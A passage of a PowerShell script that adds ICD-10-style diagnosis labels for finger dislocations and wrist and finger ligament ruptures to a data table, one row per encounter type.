distal interphalangeal joint of right little finger","Subluxation of distal interphalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right little finger","Subluxation of distal interphalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of right little finger","Subluxation of distal interphalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left little finger","Subluxation of distal interphalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left little finger","Subluxation of distal interphalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of left little finger","Subluxation of distal interphalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of other finger","Subluxation of distal interphalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of other finger","Subluxation of distal interphalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of other finger","Subluxation of distal interphalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of unspecified finger","Subluxation of distal interphalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of unspecified finger","Subluxation of distal interphalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Subluxation of distal interphalangeal joint of unspecified finger","Subluxation of distal interphalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right index finger","Unspecified dislocation of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right index finger","Unspecified dislocation of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right index finger","Unspecified dislocation of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left index finger","Unspecified dislocation of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left index finger","Unspecified dislocation of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left index finger","Unspecified dislocation of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right middle finger","Unspecified dislocation of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right middle finger","Unspecified dislocation of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right middle finger","Unspecified dislocation of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left middle finger","Unspecified dislocation of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left middle finger","Unspecified dislocation of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left middle finger","Unspecified dislocation of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right ring finger","Unspecified dislocation of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right ring finger","Unspecified dislocation of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right ring finger","Unspecified dislocation of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left ring finger","Unspecified dislocation of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left ring finger","Unspecified dislocation of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left ring finger","Unspecified dislocation of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right little finger","Unspecified dislocation of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right little finger","Unspecified dislocation of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right little finger","Unspecified dislocation of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left little finger","Unspecified dislocation of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left little finger","Unspecified dislocation of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left little finger","Unspecified dislocation of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of other finger","Unspecified dislocation of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of other finger","Unspecified dislocation of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of other finger","Unspecified dislocation of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified finger","Unspecified dislocation of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified finger","Unspecified dislocation of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified finger","Unspecified dislocation of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right index finger","Dislocation of metacarpophalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right index finger","Dislocation of metacarpophalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right index finger","Dislocation of metacarpophalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left index finger","Dislocation of metacarpophalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left index finger","Dislocation of metacarpophalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left index finger","Dislocation of metacarpophalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right middle finger","Dislocation of metacarpophalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right middle finger","Dislocation of metacarpophalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right middle finger","Dislocation of metacarpophalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left middle finger","Dislocation of metacarpophalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left middle finger","Dislocation of metacarpophalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left middle finger","Dislocation of metacarpophalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right ring finger","Dislocation of metacarpophalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right ring finger","Dislocation of metacarpophalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right ring finger","Dislocation of metacarpophalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left ring finger","Dislocation of metacarpophalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left ring finger","Dislocation of metacarpophalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left ring finger","Dislocation of metacarpophalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right little finger","Dislocation of metacarpophalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right little finger","Dislocation of metacarpophalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of right little finger","Dislocation of metacarpophalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left little finger","Dislocation of metacarpophalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left little finger","Dislocation of metacarpophalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of left little finger","Dislocation of metacarpophalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of other finger","Dislocation of metacarpophalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of other finger","Dislocation of metacarpophalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of other finger","Dislocation of metacarpophalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of unspecified finger","Dislocation of metacarpophalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of unspecified finger","Dislocation of metacarpophalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of metacarpophalangeal joint of unspecified finger","Dislocation of metacarpophalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right index finger","Dislocation of unspecified interphalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right index finger","Dislocation of unspecified interphalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right index finger","Dislocation of unspecified interphalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left index finger","Dislocation of unspecified interphalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left index finger","Dislocation of unspecified interphalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left index finger","Dislocation of unspecified interphalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right middle finger","Dislocation of unspecified interphalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right middle finger","Dislocation of unspecified interphalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right middle finger","Dislocation of unspecified interphalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left middle finger","Dislocation of unspecified interphalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left middle finger","Dislocation of unspecified interphalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left middle finger","Dislocation of unspecified interphalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right ring finger","Dislocation of unspecified interphalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right ring finger","Dislocation of unspecified interphalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right ring finger","Dislocation of unspecified interphalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left ring finger","Dislocation of unspecified interphalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left ring finger","Dislocation of unspecified interphalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left ring finger","Dislocation of unspecified interphalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right little finger","Dislocation of unspecified interphalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right little finger","Dislocation of unspecified interphalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of right little finger","Dislocation of unspecified interphalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left little finger","Dislocation of unspecified interphalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left little finger","Dislocation of unspecified interphalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of left little finger","Dislocation of unspecified interphalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of other finger","Dislocation of unspecified interphalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of other finger","Dislocation of unspecified interphalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of other finger","Dislocation of unspecified interphalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of unspecified finger","Dislocation of unspecified interphalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of unspecified finger","Dislocation of unspecified interphalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of unspecified interphalangeal joint of unspecified finger","Dislocation of unspecified interphalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right index finger","Dislocation of proximal interphalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right index finger","Dislocation of proximal interphalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right index finger","Dislocation of proximal interphalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left index finger","Dislocation of proximal interphalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left index finger","Dislocation of proximal interphalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left index finger","Dislocation of proximal interphalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right middle finger","Dislocation of proximal interphalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right middle finger","Dislocation of proximal interphalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right middle finger","Dislocation of proximal interphalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left middle finger","Dislocation of proximal interphalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left middle finger","Dislocation of proximal interphalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left middle finger","Dislocation of proximal interphalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right ring finger","Dislocation of proximal interphalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right ring finger","Dislocation of proximal interphalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right ring finger","Dislocation of proximal interphalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left ring finger","Dislocation of proximal interphalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left ring finger","Dislocation of proximal interphalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left ring finger","Dislocation of proximal interphalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right little finger","Dislocation of proximal interphalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right little finger","Dislocation of proximal interphalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of right little finger","Dislocation of proximal interphalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left little finger","Dislocation of proximal interphalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left little finger","Dislocation of proximal interphalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of left little finger","Dislocation of proximal interphalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of other finger","Dislocation of proximal interphalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of other finger","Dislocation of proximal interphalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of other finger","Dislocation of proximal interphalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of unspecified finger","Dislocation of proximal interphalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of unspecified finger","Dislocation of proximal interphalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of proximal interphalangeal joint of unspecified finger","Dislocation of proximal interphalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right index finger","Dislocation of distal interphalangeal joint of right index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right index finger","Dislocation of distal interphalangeal joint of right index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right index finger","Dislocation of distal interphalangeal joint of right index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left index finger","Dislocation of distal interphalangeal joint of left index finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left index finger","Dislocation of distal interphalangeal joint of left index finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left index finger","Dislocation of distal interphalangeal joint of left index finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right middle finger","Dislocation of distal interphalangeal joint of right middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right middle finger","Dislocation of distal interphalangeal joint of right middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right middle finger","Dislocation of distal interphalangeal joint of right middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left middle finger","Dislocation of distal interphalangeal joint of left middle finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left middle finger","Dislocation of distal interphalangeal joint of left middle finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left middle finger","Dislocation of distal interphalangeal joint of left middle finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right ring finger","Dislocation of distal interphalangeal joint of right ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right ring finger","Dislocation of distal interphalangeal joint of right ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right ring finger","Dislocation of distal interphalangeal joint of right ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left ring finger","Dislocation of distal interphalangeal joint of left ring finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left ring finger","Dislocation of distal interphalangeal joint of left ring finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left ring finger","Dislocation of distal interphalangeal joint of left ring finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right little finger","Dislocation of distal interphalangeal joint of right little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right little finger","Dislocation of distal interphalangeal joint of right little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of right little finger","Dislocation of distal interphalangeal joint of right little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left little finger","Dislocation of distal interphalangeal joint of left little finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left little finger","Dislocation of distal interphalangeal joint of left little finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of left little finger","Dislocation of distal interphalangeal joint of left little finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of other finger","Dislocation of distal interphalangeal joint of other finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of other finger","Dislocation of distal interphalangeal joint of other finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of other finger","Dislocation of distal interphalangeal joint of other finger, sequela") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of unspecified finger","Dislocation of distal interphalangeal joint of unspecified finger, initial encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of unspecified finger","Dislocation of distal interphalangeal joint of unspecified finger, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Dislocation of distal interphalangeal joint of unspecified finger","Dislocation of distal interphalangeal joint of unspecified finger, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right wrist","Traumatic rupture of unspecified ligament of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right wrist","Traumatic rupture of unspecified ligament of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right wrist","Traumatic rupture of unspecified ligament of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left wrist","Traumatic rupture of unspecified ligament of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left wrist","Traumatic rupture of unspecified ligament of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left wrist","Traumatic rupture of unspecified ligament of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of unspecified wrist","Traumatic rupture of unspecified ligament of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of unspecified wrist","Traumatic rupture of unspecified ligament of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of unspecified wrist","Traumatic rupture of unspecified ligament of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right wrist","Traumatic rupture of collateral ligament of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right wrist","Traumatic rupture of collateral ligament of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of right wrist","Traumatic rupture of collateral ligament of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left wrist","Traumatic rupture of collateral ligament of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left wrist","Traumatic rupture of collateral ligament of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of left wrist","Traumatic rupture of collateral ligament of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of unspecified wrist","Traumatic rupture of collateral ligament of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of unspecified wrist","Traumatic rupture of collateral ligament of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of collateral ligament of unspecified wrist","Traumatic rupture of collateral ligament of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right radiocarpal ligament","Traumatic rupture of right radiocarpal ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right radiocarpal ligament","Traumatic rupture of right radiocarpal ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right radiocarpal ligament","Traumatic rupture of right radiocarpal ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left radiocarpal ligament","Traumatic rupture of left radiocarpal ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left radiocarpal ligament","Traumatic rupture of left radiocarpal ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left radiocarpal ligament","Traumatic rupture of left radiocarpal ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified radiocarpal ligament","Traumatic rupture of unspecified radiocarpal ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified radiocarpal ligament","Traumatic rupture of unspecified radiocarpal ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified radiocarpal ligament","Traumatic rupture of unspecified radiocarpal ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ulnocarpal (palmar) ligament","Traumatic rupture of right ulnocarpal (palmar) ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ulnocarpal (palmar) ligament","Traumatic rupture of right ulnocarpal (palmar) ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of right ulnocarpal (palmar) ligament","Traumatic rupture of right ulnocarpal (palmar) ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ulnocarpal (palmar) ligament","Traumatic rupture of left ulnocarpal (palmar) ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ulnocarpal (palmar) ligament","Traumatic rupture of left ulnocarpal (palmar) ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of left ulnocarpal (palmar) ligament","Traumatic rupture of left ulnocarpal (palmar) ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ulnocarpal (palmar) ligament","Traumatic rupture of unspecified ulnocarpal (palmar) ligament, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ulnocarpal (palmar) ligament","Traumatic rupture of unspecified ulnocarpal (palmar) ligament, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ulnocarpal (palmar) ligament","Traumatic rupture of unspecified ulnocarpal (palmar) ligament, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right wrist","Traumatic rupture of other ligament of right wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right wrist","Traumatic rupture of other ligament of right wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of right wrist","Traumatic rupture of other ligament of right wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left wrist","Traumatic rupture of other ligament of left wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left wrist","Traumatic rupture of other ligament of left wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of left wrist","Traumatic rupture of other ligament of left wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of unspecified wrist","Traumatic rupture of other ligament of unspecified wrist, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of unspecified wrist","Traumatic rupture of other ligament of unspecified wrist, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of other ligament of unspecified wrist","Traumatic rupture of other ligament of unspecified wrist, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right index finger at metacarpophalangeal and interphalangeal joint, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of right index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of right index finger at metacarpophalangeal and interphalangeal joint, sequela") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of unspecified ligament of left index finger at metacarpophalangeal and interphalangeal joint, initial encounter") + $null = $DiagnosisList.Rows.Add("Traumatic rupture of unspecified ligament of left index finger at metacarpophalangeal and interphalangeal joint","Traumatic rupture of 